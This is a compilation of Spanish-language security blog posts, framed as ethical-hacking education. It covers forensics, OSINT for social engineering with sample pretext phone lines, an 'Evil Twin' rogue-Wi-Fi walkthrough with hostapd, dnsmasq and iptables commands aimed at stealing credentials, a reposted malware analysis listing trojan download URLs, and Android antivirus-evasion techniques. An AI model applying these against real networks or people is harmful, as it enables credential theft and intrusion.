Mobile Security

7 PASOS IMPORTANTES DURANTE UNA INVESTIGACIÓN DE ANÁLISIS FORENSE

Posted on

A continuación se presenta un resumen de los pasos importantes que una empresa de seguridad informática deben cubrir durante una investigación de análisis forense. Cualquier diplomado de seguridad informática también debe enfocar sobre estos pasos.

VERIFICACIÓN

Normalmente la investigación de análisis forense se llevará a cabo como parte de un escenario de respuesta a incidentes según profesores de diplomado de seguridad informática, como el primer paso se debe verificar que un incidente ha pasado. Determinar la amplitud y el alcance del incidente, evaluar el caso.

¿Cuál es la situación, la naturaleza del caso y sus características específicas? Este paso es importante porque ayudará a una empresa de seguridad informática a determinar las características del incidente y definir el mejor enfoque para identificar, conservar y reunir evidencias. También podría ayudar a justificar a dueños del negocio de desconectar un sistema.

digital-forensics

DESCRIPCIÓN DEL SISTEMA

Siguiente paso en análisis forense es donde una empresa de seguridad informática empezará a reunir información sobre el incidente específico. Comenzando por tomar notas y describir el sistema que se va a analizar, cuál sea el sistema que está siendo adquirido, ¿cuál es el papel del sistema en la organización y en la red? El esquema del sistema operativo y su configuración general, tales como formato de disco, la cantidad de RAM y la ubicación de las pruebas según profesores de diplomado de seguridad informática.

ADQUISICIÓN DE EVIDENCIA

Esto paso en análisis forense incluye Identificar las posibles fuentes de datos, adquirir datos volátiles y no volátiles, verificar la integridad de los datos y garantizar la cadena de custodia. Cuando tengas dudas de que colectar para estar en el lado seguro y es mejor recoger demasiado a que te falte. Durante esta etapa también es importante que la empresa de seguridad informática dé prioridad a colección de evidencias e involucra a los dueños del negocio para determinar la ejecución y el impacto en el negocio de las estrategias elegidas. Dado que los datos volátiles cambian con el tiempo, el orden en el que se recogen los datos es importante acuerdo a recomendaciones de diplomado de seguridad informática. Después de recoger estos datos volátiles vas a entrar en la siguiente etapa de recogida de datos no volátiles como el disco duro. Después de la adquisición de datos, garantiza y verifica su integridad. También debes ser capaz de describir claramente cómo se encontró la evidencia, la forma en que se manejó y todo lo que pasó con él, es decir la cadena de custodia.

ANÁLISIS DE LÍNEA DE TIEMPO

Después de la adquisición de evidencias una empresa de seguridad informática podrá empezar a hacer investigación y análisis en el laboratorio forense. Comienza por hacer un análisis de línea de tiempo. Este es un paso crucial y muy útil en análisis forense y cada diplomado de seguridad informática debe cubrir esto, ya que incluye información tal como cuando se modifican los archivos, acceso, cambios y creaciones en un formato legible por humanos. El plazo de presentación de artefactos de memoria también puede ser muy útil en la reconstrucción lo que sucedió según Mike Ross un experto de iicybersecurity IICS, una empresa de seguridad informática.

MEDIOS DE COMUNICACIÓN Y ANÁLISIS DE LOS ARTEFACTOS

En este paso de análisis forense tú vas a ser abrumado con la cantidad de información que tú podrías estar buscando. Un experto de empresa de seguridad informática debe ser capaz de responder a preguntas como, qué programas fueron ejecutados, que archivos fueron descargados, a qué archivos se les hizo clic, que directorios fueron abiertos, que archivos fueron borrados, dónde el usuario visito y muchas otras cosas más. Una técnica utilizada con el fin de reducir el conjunto de datos es identificar los archivos que sea conocen bien y los que se sabe que son malos. Cuidado con las técnicas anti-forenses como esteganografía o alteración y destrucción de datos, que tendrán impacto en análisis forense. Según profesores de diplomado de seguridad informática de International Institute of Cyber Security este paso es muy importante para cualquier experto de forense digital.

BÚSQUEDA DE BYTE O TEXTO

Esta etapa de análisis forense consistirá en el uso de herramientas que buscarán las imágenes en bruto de bajo nivel. Si usted sabe lo que está buscando, puede utilizar este método para encontrarlo. En este paso una empresa de seguridad informática utilizara las herramientas y técnicas que buscarán firmas de bytes de archivos conocidos. Las cadenas o firmas de bytes que vas a estar buscando son las que son relevantes para el caso de que estás tratando.

INFORME DE LOS RESULTADOS

La fase final consiste en informar sobre los resultados de los análisis forense, que pueden incluir la descripción de las acciones que se realizaron, la determinación de qué es necesario realizar , que otras acciones, y recomendar mejoras en las políticas, directrices, procedimientos, herramientas y otros aspectos del proceso forense .Informe de los resultados es una parte clave de cualquier investigación según expertos de empresa de seguridad informática.

Cualquier diplomado de seguridad informática debe enseñar estos pasos en detalle para que sean expertos en el área de análisis forense.

¿CÓMO OBTENER INFORMACIÓN PARA EL ATAQUE DE INGENIERÍA SOCIAL?

Posted on

La ingeniería social es la práctica del uso de medios no técnicos, por lo general la comunicación a través del teléfono u otro medio, para atacar un objetivo. La ingeniería social no puede sonar eficaz y lo que esperamos demostrar en este artículo es que es extremadamente eficaz como método de ataque y que las empresas deben tomar esta forma de ataque tan seriamente como cualquier otro método de ataque según expertos de IICS una empresa de seguridad de la información.

Hay dos fases principales de un ataque de ingeniería social (SE) acuerdo a curso de seguridad de la información. La primera fase es la reconnaissance phase, donde la SE reunirá información de inteligencia sobre su objetivo. Esto les ayuda a infundir confianza en su objetivo de que la SE es quien dice ser y el objetivo se confiara en la SE. La segunda fase es la fase de ataque en el que la SE llamará al destino y comenzara el ataque.

RECONNAISSANCE – OPEN SOURCE INTELLIGENCE (OSINT)

Durante la fase de reconnaissance, la SE reunirá toda la información sobre su objetivo como sea posible. La siguiente es una lista de algunas de las herramientas utilizadas por los expertos de International Institute of Cyber Security iicybersecurity, una  empresa de seguridad de la información :

  • Google – Buscar en Google la empresa, buscando en el directorio de empleados, buscar en Google los nombres de los empleados y excavar de forma gradual saca una montaña de información.
  • Maltego – Maltego se hace por Paterva y es una poderosa herramienta para recopilar, combinar y analizar OSINT sobre un objetivo. Es una excelente plataforma para reunir y analizar OSINT según profesor de curso de seguridad de la información
  • Whois – Whois te dirá quién es dueño de un dominio. Si una empresa está en la mira, el administrador del dominio de la empresa frecuentemente aparece con su número de teléfono o un número para el departamento de TI.
  • Twitter, Facebook, LinkedIn, FriendFinder y otros sitios sociales o sitios con perfiles públicos pueden revelar una gran cantidad de conocimientos acerca de un individuo o una empresa. Los empleados de la compañía pueden revelar detalles acerca de la estructura de empresa, horarios, nombres de compañeros, explican expertos de empresa de seguridad de la información.
  • Google – Esto es lo primero que enseñan en un curso de seguridad de la información. Una característica poco conocida de imágenes de Google es la capacidad de rastrear una foto de perfil en una búsqueda de Google imágenes. Si usted puede encontrar una foto de perfil pública para un individuo, trate de rastrear en búsqueda de imágenes de Google.
  • PiPl.com – Este servicio puede ser un poco atemorizante. Trate de buscar su propio nombre con o sin su ubicación. A continuación, haga clic en el resultado de que es usted. Usted se sorprenderá de la cantidad de datos manejados por pipl.com.
  • Shodan – Shodan es un increíblemente potente motor de búsqueda de la red. Se va alrededor de la indexación qué los servicios que están escuchando en los puertos de red. Se puede proporcionar, por ejemplo, una lista de los routers Cisco de escucha en un puerto en particular de rango de direcciones IP de una empresa.
  • TinEye – Acuerdo a curso de seguridad de la información es una búsqueda de la imagen inversa que también es útil para buscar fotos de perfil que coincidan con una foto existente. Revela perfiles de usuarios alrededor de la red.
  • Archive.org – También se llama WayBackMachine, es una de herramientas favoritas de empresas de seguridad de la información. Esto le permite ver las versiones anteriores de una página web, a menudo se remonta a varios años. Esto puede proporcionar nombres de los empleados anteriores que ya no está con la empresa, o la inteligencia en las actualizaciones de sitio y los cambios.
  • Monster.com, GlassDoor, Indeedy otros sitios web relacionados con el empleo pueden proporcionar una gran cantidad de información en sus descripciones de trabajo. Usted puede aprender sobre qué hardware y software una empresa está utilizando, qué nivel de autorización de seguridad de la información los empleados tienen y más.

Estas son sólo algunas de las herramientas que los ingenieros sociales OSINT utilizan para recopilar datos sobre un objetivo.

EXPLOTACIÓN – LOS ATAQUES DE INGENIERO SOCIAL!

Aquí hay algunos de los tipos de OSINT, un ingeniero social buscará y ilustran cómo se puede utilizar la información:

  • Los nombres de los empleados: “Hola, ¿Puedo hablar con Bob Simmonds?”
  • Sus nombres colega: “Hola Bob, esta es Mary de TI. Acabo de hablar por teléfono con MattSmith “.
  • Lo que sus colegas están haciendo: “Matt está enfermo hoy…”
  • Ubicación de las mesas personales: “. … Pero estoy seguro de que sabes que ya que ustedes comparten un cubículo”
  • Los nuevos despliegues de tecnología en una empresa: “Yo quería saber cómo esa nueva estación de trabajo está trabajando para usted.”
  • ¿Qué tecnología se está utilizando: “Yo sé que Windows 10 no es el favorito de todos, pero espero que la nueva versión de Office te está ayudando”

En este punto, usted está convencido de que podría solamente estar hablando con un empleado de TI interno porque ya sabes mucho. Usted probablemente va a compartir información libremente con esta persona menciona experto de seguridad de la información.

Como se ve, gastando tanto tiempo reuniendo OSINT en una empresa antes de ponerse en contacto con ellos puede hacer un ataque mucho más eficaz. Ataques de ingeniería social son muy eficaces porque los seres humanos (que somos nosotros) suelen ser el eslabón más débil y más aprovechable en una red segura. Es evidente la importancia de desarrollar políticas y procedimientos de la organización con ayuda de expertos de empresa de seguridad de la información y tomar curso de seguridad de la información para protegerse de este tipo de ataque.

¿CÓMO EXTRAER DATOS FORENSES DEL DISPOSITIVO MÓVIL DE ANDROID?

Posted on Updated on

En este artículo, vamos a hablar de la utilización de los programas que se utilizan en el día a día en la informática forense y la exanimación para el análisis de los dispositivos móviles que ejecutan el sistema operativo Android con ayuda de expertos de pruebas de penetración.

INTRODUCCIÓN

La mayoría de los dispositivos móviles en el mundo ejecutan el sistema operativo Android. Durante la exanimación de los dispositivos móviles que ejecutan el sistema operativo Android (en adelante, dispositivos móviles) expertos de informática forense se enfrentan a las siguientes dificultades:

  1. No hay un programa de informática forense que soporte la extracción de datos de todos los dispositivos móviles existentes en el mundo.
  2. Hay un gran número de programas diseñados para el sistema operativo Android, en los cuales los datos podrían ser potencialmente interesantes para los investigadores de pruebas de penetración. Hasta el momento, no existe un programa de apoyo de análisis forense de los registros y los datos de todos esos programas.
  3. El tiempo, cuando los investigadores estaban interesados en los datos de una libreta de teléfonos, llamadas, mensajes SMS que fueron extraídos por el experto de pruebas de penetración, ha pasado. Ahora también están interesados en la historia de los recursos de la red (datos de navegadores), la historia de los programas de intercambio de mensajes cortos, los archivos eliminados (archivos gráficos, vídeos, bases de datos SQLite, etc.) y otra información criminalística valiosa acuerdo una encuesta de empresas de pruebas de penetración.
  4. Los delincuentes a menudo eliminan los archivos de la memoria de sus dispositivos móviles, tratando de ocultar información sobre el crimen cometido.
  5. Los laboratorios de informática forense y subdivisiones de pruebas de penetración que examinan no pueden permitirse el lujo de comprar paquetes de software especializado, debido al alto costo.

 CntTpXgUkAABCRN

SOLUCIÓN PARA ESTO

EXTRACCIÓN DE DATOS FÍSICOS DE LOS DISPOSITIVOS MÓVILES

Teniendo en cuenta el hecho de que los investigadores también están interesados en los archivos borrados que se encuentran en la memoria de los dispositivos móviles, los expertos de informática forense tienen que hacer la extracción de datos físicos de la memoria del dispositivo móvil. Eso significa que los expertos de análisis forense tienen que obtener una copia completa del dispositivo examinado. Un experto de análisis forense puede hacer un volcado de memoria física utilizando los métodos siguientes:

  1. Extracción de los datos directamente de los chips de memoria del dispositivo móvil utilizando el método de Chip-off. Según empresa de pruebas de penetración, este método más difícil de extracción de datos, pero a veces es la única manera de extraer los datos desde el dispositivo.
  2. La extracción de datos desde la memoria del dispositivo móvil utilizando la interfaz JTAG de depuración. Este método permite extraer datos de los dispositivos que tengan insignificantes daños en hardware y software.
  3. Extracción de los datos de a través de programas especializados (por ejemplo,Oxygen Forensic Suit) y complejos hardware-software (.XRY (Micro Systemation), UFED (CellebriteForensics), Secure View 3.
  4. Creación de copia de la memoria del dispositivo móvil manualmente.

Métodos combinados según expertos de informática forense y pruebas de penetración.

EXTRACCIÓN DE DATOS LÓGICOS

2.1. Ganando un acceso a los datos que se encuentran en copia de una memoria del dispositivo móvil

No importa qué método los expertos análisis forense utilicen para obtener la copia de memoria del dispositivo móvil, al final un experto de análisis forense va a recibir un archivo (o varios archivos), los cuales tienen que ser examinados de alguna manera y lo que necesita es extraer los datos necesarios.

En este caso, la tarea del experto de análisis forense es la extracción solamente de datos lógicos que se encuentran en la copia de la memoria de un dispositivo móvil que ejecuta el sistema operativo Android, se puede montar una imagen recibida en FTK Imager o UFS Explorer. Según expertos de pruebas de penetración, copias de memoria de los dispositivos móviles que ejecutan el sistema operativo Android por lo general contienen un gran número de particiones lógicas. Los datos del usuario de dispositivos móviles están en la partición lógica, que se nombra USERDATA. De esta partición, puedes extraer datos tales como bases de datos, vídeos, archivos gráficos, archivos de audio, etc.

Forense Android

LA DESCODIFICACIÓN DE LA BASE DE DATOS SQLIT

Como regla general, bases de datos SQLite extraídas de la memoria de copia del dispositivo móvil son de sumo interés para los expertos de análisis forense. En primer lugar, está conectado con el hecho de que la información criminalística valiosa se almacena en este formato. Según expertos de pruebas de penetración, en bases de datos SQLite se almacenan los datos siguientes: una agenda de teléfonos, llamadas, mensajes SMS, mensajes MMS, diccionarios, los datos de los dispositivos móviles de los navegadores web, registros de sistema del dispositivo móvil y etc.

Tipo de data Nombre del archivo
1 Phone book \data\data\com.android.providers.contacts\ databases\contacts2.db
2 SMS, MMS messages \data\data\com.android.providers.telephony\ databases\mmssms.db
3 Calendar \data\com.android.providers.calendar\databases\ calendar.db
4 Log \data\com.sec.android.provider.logsprovider\ databases\logs.db
5 User’s data \data\system\users\accounts.db
6 Web-browser history \data\data\com.android.browser\databases\ browser2.db
7 Dictionary \data\user\comc.android.providers.userdictionary\ databases\user_dict.db

Algunos investigadores proponen utilizar dos programas para decodificar los archivos de bases de datos SQLite: DCode v4.02a, SQLite Database Browser 2.0b1. En caso de que nosotros usemos la combinación de estos programas, todavía hay un problema en la recuperación y el análisis de los archivos borrados.

Una de las herramientas que solucionan este problema Oxygen Forensic SQLite Viewer.

RECUPERACIÓN DE DATOS Y ARCHIVOS BORRADOS

La recuperación de los datos y los archivos borrados de los dispositivos móviles es un proceso complicado. No es común, pero la mayor parte de los programas de análisis forense no son compatibles con el sistema de archivos YAFFS2. Por eso el experto de informática forense puede encontrarse a sí mismo en una situación en que su programa no es capaz de recuperar algo de la descarga de memoria del dispositivo móvil durante el examen de copia física de los dispositivos móviles que ejecutan el sistema operativo Android. Como muestra experiencia de análisis forense práctica, es difícil recuperar vídeos borrados y archivos de gran tamaño de esas copias.

UFS Explorer, R-Studio mostró los mejores resultados en la esfera de la recuperación de datos borrados de dispositivos móviles que ejecutan el sistema operativo Android.

Forense Android2

Para la recuperación de datos borrados y los archivos de dispositivos móviles que ejecutan el sistema operativo Android los cuales contienen archivos de YAFFS2, se recomienda utilizar los siguientes programas: Encase Forensic version 7, The Sleuth Kit o Belkasoft Evidence Center.

Forense Android3

ANÁLISIS DE THUMBNAILS BASES

Al igual que en los sistemas operativos Microsoft Windows, en el sistema operativo Android hay archivos que son thumbnails bases y que contienen imágenes en miniatura de los archivos gráficos y de vídeo, creados por el usuario (incluyendo archivos borrados). En el sistema operativo Microsoft Windowss thumbnails bases tiene nombres: Thumbs.DB o thumbcache_xxx.db (donde xxx es el tamaño de la imagen en miniatura en la base). En el sistema operativo Android no hay un nombre unificado de tales bases según expertos de pruebas de penetración . Además, vale la pena señalar que estas bases se pueden encontrar como en el almacenamiento interno al igual que en la tarjeta de memoria instalada en el dispositivo móvil. Para buscar thumbnails bases nosotros utilizamos Thumbnail Expert Forensic. Por regla general, este tipo de archivos permiten recibir información criminalística valiosa, si las principales evidencias son archivos gráficos (fotos) o videos que fueron tomados por el dispositivo móvil examinado.
Forense Android 4

CONCLUSIÓN

La combinación de los programas tradicionales para el análisis de los dispositivos móviles y los programas tradicionales que se utilizan en forense cibernética da los mejores resultados de análisis de copia de los dispositivos móviles que ejecutan el sistema operativo Android.

¿CÓMO HACER UN ATAQUE EVIL TWIN PARA OBTENER INFORMACIÓN PERSONAL?

Posted on Updated on

La idea es la creación de tu propia red inalámbrica que se vea exactamente como la que usted está atacando. Acuerdo con los profesionales de ethical hacking, las computadoras no van a diferenciar entre los SSID´s que comparten el mismo nombre. En cambio, para visualizar únicamente el que tiene la señal de conexión más fuerte. El objetivo es que la víctima se conecte a su red falsificada y ejecute un man-in-the-middle (MITM) y enviar sus datos a la Internet sin que él jamás sospeche nada. Según curso de ciberseguridad, esto puede ser usado para robar credenciales de alguien o DNS falsas por lo que la víctima visitara un sitio de phishing, y ¡muchos más!

CnEIp_EVIAAw_mK

HARDWARE / SOFTWARE NECESARIOS:

Un adaptador inalámbrico compatible TL-WN722N.

Kali Linux – Puedes ejecutar el comando a partir de una USB o una VM.

Una forma alternativa de conectarse a Internet – La tarjeta que está utilizando va a estar ocupado y por lo tanto no se puede conectar a internet. Usted necesitará una forma de conectarse, de manera que se transmita la información de la víctima sucesivamente. Según recomendación de experto de ethical hacking, es posible utilizar un adaptador inalámbrico por separado, conexión 3G / módem o una conexión Ethernet a una red.

PASOS:

  1. Instalar el software que también establecerá nuestro servicio de DHCP.
  2. Instalar algún software que falsifique la AP.
  3. Editar los archivos .conf para conseguir nuestra red pasando.
  4. Iniciar los servicios.
  5. Ejecutar los ataques.

CONFIGURACIÓN DEL ADAPTADOR INALÁMBRICO

Esto va a suponer que usted está ejecutando Kali desde una máquina virtual en Virtual Box.

Según el curso de ciberseguridad, en primer lugar, conecte el adaptador inalámbrico en uno de los puertos USB.

En segundo lugar, si ya está ejecutando Kali, apáguelo. Abra virtual Box y vaya a la configuración de la VM.

Evil Twin attack

A continuación, haga clic en “Red” y seleccione la ficha Adaptador 2.

Haga clic en “Habilitar adaptador de red ‘y luego seleccione’ Adaptador puenteado ‘

A continuación, haga clic en el nombre y seleccione el adaptador inalámbrico.

Evil Twin attack

Haga clic en Aceptar y luego arrancar en su VM.

Escriba su nombre de usuario y contraseña e iniciar sesión. El valor por defecto es root / Toor.

Según experto de ethical hacking Mike Dens, aquí viene la parte difícil. Hemos establecido Kali para utilizar el adaptador inalámbrico como una NIC, pero a la VM, el adaptador inalámbrico no se ha conectado todavía.

Ahora en la máquina virtual, vaya a la parte superior y haga clic en “Dispositivos”, seleccione “Dispositivos USB”, y, finalmente, haga clic en el adaptador inalámbrico.

Evil Twin attack

A veces, cuando seleccionamos el dispositivo USB, no se carga correctamente en la máquina virtual. Según el curso de ciberseguridad que si usted está teniendo problemas para conseguir Kali para reconocer el adaptador inalámbrico, intente desactivar los puertos USB. Es posible que tenga que probar varios antes de que funcione.

DNSMASQ

Abre una terminal.

Teclear el comando:

apt-get install -y hostapd dnsmasq wireless-tools iw wvdial

Esto instalará todo el software necesario.

Ahora, vamos a configurar dnsmasq para servir a DHCP y DNS en su interfaz inalámbrica e iniciar el servicio

Evil Twin attack

Voy a pasar por este paso a paso para que pueda ver qué es exactamente lo que está sucediendo:

cat <<EOF > etc/dnsmasq.conf – Esto le indica a la computadora para tomar todo lo que vamos a escribir e insertarlo en el archivo /etc/dnsmaq.conf.

log-facility=var/log/dnsmasq.log – Esto le indica al ordenador dónde debe poner todos los registros de que este programa podría generar.

#address=/#/10.0.0.1 – – es un comentario diciendo que vamos a utilizar la red 10.0.0.0/24.

interface=wlan0 – le dice al ordenador cual NIC vamos a utilizar para el DNS y el servicio DHCP.

dhcp-range=10.0.0.10,10.0.0.250,12h – Esto le indica a la computadora que rango de direcciones IP nosotros deseamos asignar a las personas..

service dnsmasq start – inicia el servicio dnsmasq.

CONFIGURACIÓN DEL PUNTO DE ACCESO INALÁMBRICO

Vamos a configurar una red con un SSID de ‘linksys’.

Evil Twin attack

ifconfig wlan0 up – Esto confirma que nuestra interfaz wlan0 está trabajando explica experto de ethical hacking.

ifconfig wlan0 10.0.0.1/24 – Establece la interfaz wlan0 con la dirección IP 10.0.0.1 en el rango de dirección privada de clase C.

iptables -t nat -A POSTROUTING -o pp0 -j MASQUERADE – Esto le indica a la computadora cómo vamos a encaminar la información según curso de ciberseguridad.

iptables -A FORWARD -i wlan0 -o ppp0 -j ACCEPT – Esto le dice al equipo que vamos a encaminar los datos de wlan0 para ppp0.

echo ‘1’ > /proc/sys/net/ipv4/ip_forward – Esto se suma el número 1 al archivo ip_forward que le dice al equipo que queremos que transmita la información.

cat <<EOF > /etc/hostapd/hostapd.conf – Una vez más, esto le dice al equipo que lo siguiente que escribimos queremos añadir al archivo hostapd.conf.

interface=wlan0 – le dice al ordenador qué interfaz queremos usar.

driver=nl80211 – le dice al ordenador que operador debe utilizar para la interfaz.

ssid=Freewifi – Esto le indica a la computadora que quieres el SSID sea, el nuestro es linksy.

service hostapd start – Arranca el servicio

En este punto, usted debe ser capaz de buscar, ya sea con su teléfono u ordenador portátil, y encontrar el punto de acceso inalámbrico Rojo.

A partir de aquí, usted debería ser capaz de comenzar a realizar todo tipo de trucos sucios, ataques MITM, la detección de paquetes, sacar contraseñas, etc. Según expertos de experto de ethical hacking y ciberseguridad, un buen programa de MITM es Ettercap. Pueden aprender más sobre este ataque durante el curso de ciberseguridad.

Malicious Documents leveraging new Anti-VM & Anti-Sandbox techniques

Posted on

Malicious documents with macros evading automated analysis systems.

Introduction

Zscaler ThreatLabZ recently came across a new wave of malicious documents evading automated analysis systems using a new technique. Malicious executables that leverage numerous techniques to detect the virtual environment and automated analysis systems are very common, but we are seeing an increasing trend of such techniques moving to the initial delivery vector (i.e. weaponized documents).

In this blog, we look at some of the anti-VM and anti-sandboxing techniques seen in the recent malicious documents including the newly added check of Microsoft Office RecentFiles count.

Weaponized Documents & anti-VM tricks

Malware authors leveraging documents with macros to download and install malware executable has been around for years; however, we are seeing a gradual evolution in these malicious documents making it harder for the security solutions to detect them proactively. ThreatLabZ has seen hundreds of new weaponized documents hit our sandbox on a regular basis:

Figure 1: New unique malicious documents

A macro is a piece of code, embedded inside Microsoft Office documents, written in a programming language known as Visual Basic for Applications (VBA). Microsoft Office’s default security settings ensures that the macros are disabled by default; however, attackers are using clever social engineering tactics to lure the user into enabling the macros. Below are two recent examples:

Figure 2: Social engineering tactics to enable macro

Malware authors are also making the macro code highly obfuscated and difficult to detect by signature based systems. In addition to highly obfuscated macros, malware authors are using multiple techniques in macros to detect the virtual environment and automated analysis systems as seen below:

Check #1 – Look for standard virtual environment strings

Figure 3: Virtual environment strings check

Check #2 – Windows Management Instrumentation (WMI) interface to identify virtual environment & automated analysis systems

Figure 4: WMI interface to detect virtual environment & sandboxes

Check #3 – Look for presence of known analysis tools on the system

Figure 5: Check for malware analysis tools

If any of these anti-VM or anti-sandbox checks is positive then the VBA macro code execution terminates and the end malware payload does not get downloaded on the system shielding it from automated analysis and detection. Alternately, the malicious document will download and install a malware executable on the victim’s system if all the anti-VM checks fail.

We have seen multiple malware families leveraging malicious documents as the initial delivery vector:

  • Ransomware Trojans (e.g. CryptoWall, Locky, Cerber)
  • Banking Trojans (e.g. Dridex)
  • Backdoor Trojans (e.g. Matsnu, Kasidet)
  • Infostealer Trojans (e.g. Fareit, VawTrak, Pony)

New anti-VM and anti-sandbox checks

In the last week of May, we started seeing a new wave of malicious documents leveraging two new techniques that prevents it from executing on many known sandbox solutions.

New Check #1 – Detect virtual environment via Office RecentFiles property

Figure 6: Microsoft Office RecentFiles property check

RecentFiles property returns a RecentFiles collection that represents the most recently accessed files. The macro code checks if the number of RecentFiles collection is less than a predefined threshold and terminates if true. Threshold value we have seen is 3 or higher.

The malware author makes an assumption here that most clean Virtual Environment snapshots will be taken after a fresh Microsoft Office install with probably one or two document files opened for testing the installation. Alternately, a standard user system with Office applications should have at least 3 or more recently accessed document files.

New Check #2 – Check for the external IP ownership

Figure 7: Check for security vendors, cloud & hosting services

Here the malware author is leveraging macro to get the external IP address of the victim’s system by using the following maxmind GeoIP service API:

https://www.maxmind.com/geoip/v2.1/city/me

This API asks for user credentials but we did not see any hardcoded credential information being sent by the malicious document. The malware author is setting the UserAgent and Referer headers for this request to get the response without any authentication. We are still verifying if this is by design or if this is an authentication bypass issue for the API that is being exploited.

Figure 8: Maxmind API usage for external IP information

The response is then compared against a predetermined list of strings (Figure X) that includes multiple known security vendors & hosting services as well as generic strings to detect data centers, hosting services, cloud based security and hosting services ownership. The macro execution will terminate if maxmind’s response for the external IP address matches any of these strings.

Upon successful checks, these new set of malicious documents were found to be downloading and installing Win32/Matsnu.Q Trojan from following URLs:

  • arabtradenet[.]com/info/content.dat
  • naivak[.]com/image/office14.ppb

Figure 9: Matsnu executable payload being downloaded

We also saw Nitol and Nymaim payloads subsequently being dropped by Matsnu Trojan.

Conclusion

Malicious documents with highly obfuscated macros have become an increasingly popular vector among cyber criminals to deliver malware executable payloads. By adding newer anti-VM and anti-analysis techniques to the malicious documents itself, the attackers are protecting the end executable payloads from being downloaded and detected by the automated analysis systems.

Source:https://www.zscaler.com

TÉCNICAS DE OCULTACIÓN DE MALWARE EN ANDROID PARA EVITAR LA DETECCIÓN DE ANTIVIRUS

Posted on Updated on

Hay diferentes tipos de técnicas de ocultación, algunas muy fáciles de aplicar, otra más complejas y difíciles de implementar. Según John Frey un profesor de hacking ético de empresa de seguridad de la información, lógicamente para aplicar las técnicas fáciles, se requiere menos tiempo y habilidades, pero te permitirá la obtención una baja caída en la tasa de detección, en cambio los más complejos necesitan más tiempo y habilidades, pero permiten alcanzar mayores caídas en la tasa de detección. Todas estas técnicas se utilizan para ocultar el código y textos del Android malware para evitar la detección de los antivirus.

IDENTIFIER RENAMING

Esta técnica intenta ocultar la aplicación, cambiar los nombres de los métodos, las clases y los identificadores de campo en la aplicación.

tecnicas de malware ocultacion

CALL INDIRECTIONS

Esta técnica modifica las llamadas dentro de la aplicación. Si tenemos una llamada al método A, esta técnica lo sustituye por una nueva llamada al método B que cuando se invoca a hacer la llamada al método original A.

CODE REORDERING

Consiste en modificar el orden de las instrucciones en el código. Por lo general, el “Goto”, es añadido en el código para mantener la secuencia original de las instrucciones durante la ejecución explica el profesor de hacking ético de una empresa de seguridad de la información.

image003

JUNK CODE INSERTION

Esta técnica consiste en añadir en el código de algunas instrucciones que se ejecutarán, pero sin cambiar la semántica de la aplicación. Las herramientas de detección que inspeccionan la secuencia de las instrucciones del software malicioso pueden ser evadidas por la estrategia de inserción de código no deseado. El código no deseado añadido al software malicioso puede ser una secuencia de nop simples o complejos ciclos de instrucciones explica John Frey, el profesor de hacking ético de una empresa de seguridad de la información .

tecnicas de malware ocultacion

ENCAPSULATE FIELD

Esta técnica consiste en la adición de un campo específico de setter y un método getter. El primero se utiliza para establecer el valor del campo y el segundo para recuperar ese valor. Así que no hay acceso directo más para el campo seleccionado, sustituido por los métodos relativos. De esta manera la utilización de un campo específico puede ser ocultada.

ENCRYPTING PAYLOADS – EXPLOITS

Código nativo se utiliza generalmente para manipular la memoria. Este tipo de código es almacenado en código binario nativo. Muy a menudo código nativo es utilizado por autores de software maliciosos debido a la falta de mecanismos de seguridad en Android. Un malware o utilizando eso puede evadir el entorno sandbox hecho por la política de permisos de Android. Según curso de hacking ético, por lo general, en malware, código nativo se almacena encriptado y se descifra solamente durante la ejecución.

COMPOSITE TRANSFORMATIONS

Todas las técnicas de ocultación vistas antes se pueden combinar con otras para mejorar el nivel ocultación del código acuerdo con los expertos de empresa de seguridad de la información. Por lo general, las estrategias que no son muy eficaces cuando se usan solas, si se usan en combinación pueden dar buenos resultados en ocultación.

REFLECTION

Una clase puede inspeccionarse a sí misma utilizando esta técnica. Se usa para obtener información sobre las clases, métodos, etc. La API del Java que soporta la reflexión es Java.Reflect. Cada instrucción de invocación está sustituido con otras instrucciones de código de bytes que utilizan llamadas reflectantes para realizar las mismas operaciones de la llamada original. En particular se utilizan tres llamadas. El forName, que encuentra una clase con un nombre preciso. El getMethod; que devuelve el sistema que pertenece a la llamada forName. La tercera es la invokeque ejecuta el procedimiento deseado. Entonces la reflexión añade un código innecesario a la original con el fin de ocultar la aplicación. Podrían aprender más sobre reflection en el curso de hacking ético.

BYTECODE ENCRYPTION

Esta técnica encripta algunas piezas de código para evadir las herramientas de anti malware basado en el análisis estático. En particular, el código malicioso se almacena encriptado en la aplicación. Por esta razón es imposible para el análisis estático detectar el código malicioso. El código malicioso se almacena encriptado y empacado. Durante la ejecución de la rutina de descifrado se llama y se descifra el código malicioso y lo carga a través de un cargador de clases establecido por el autor del malware.

STRING ENCRYPTION

Encripta los textos de una aplicación utilizando una operación XOR. El texto original se descompone durante la ejecución proporcionando el encriptado a la rutina de descifrado.

CLASS ENCRYPTION

Se utiliza para cifrar todas las clases de la aplicación. Comprime las clases encriptadas y las almacenar en la aplicación. Cuando la aplicación maliciosa se ejecuta las clases encriptadas qe necesitan ser descomprimidas se descifradas y después se cargan en la memoria. Por lo general, con el metodoClassLoader(), getDeclaredConstructor (), y newInstance () una nueva instancia de la clase se genera y sus campos y métodos se invocan a través de la reflexión.

ENTRY POINT CLASSES, ARCHIVOS XML, OCULTACION DE ASSESTS

Esta técnica consiste en ocultar el ingreso a las carpetas y archivos entry point classes xml usando una encriptación. El objetivo es evitar la detección de algunas herramientas anti-malware que inspeccionan estos archivos.

Estas son algunas de las técnicas de evasión antivirus para dispositivos Android. Usted puede aprender más acerca de estas técnicas durante el hacking ético de empresa de seguridad de la información.

Leer Mas: http://noticiasseguridad.com/malware-virus/herramientas-para-ocultar-malware-de-android-y-evitar-la-deteccion-del-antivirus

¿CÓMO HACER INGENIERÍA REVERSA DEL IOS?

Posted on

iOS es una plataforma de código cerrado. El interés en mirar en núcleo de IOS puede estar justificado por diferentes razones. Por ejemplo, es posible que desee ver en el proceso de verificación de código de la firma e investigación de vulnerabilidad.

Este artículo le mostrará paso a paso cómo obtener, descifrar y extraer una versión binaria de núcleo de IOS con ayuda del experto de análisis de vulnerabilidades informáticas.

Santoku es un sistema operativo de código abierto y libre que se centra en el análisis forense del dispositivo móvil, análisis de malware móvil, y la seguridad móvil.

¿QUE NECESITAS?

  • Una instalación funcionando de Linux Santoku
  • Un dispositivo iOS
  • Algunas herramientas que encontrarás al leer el artículo
  • IDA Pro y HexRays plugin

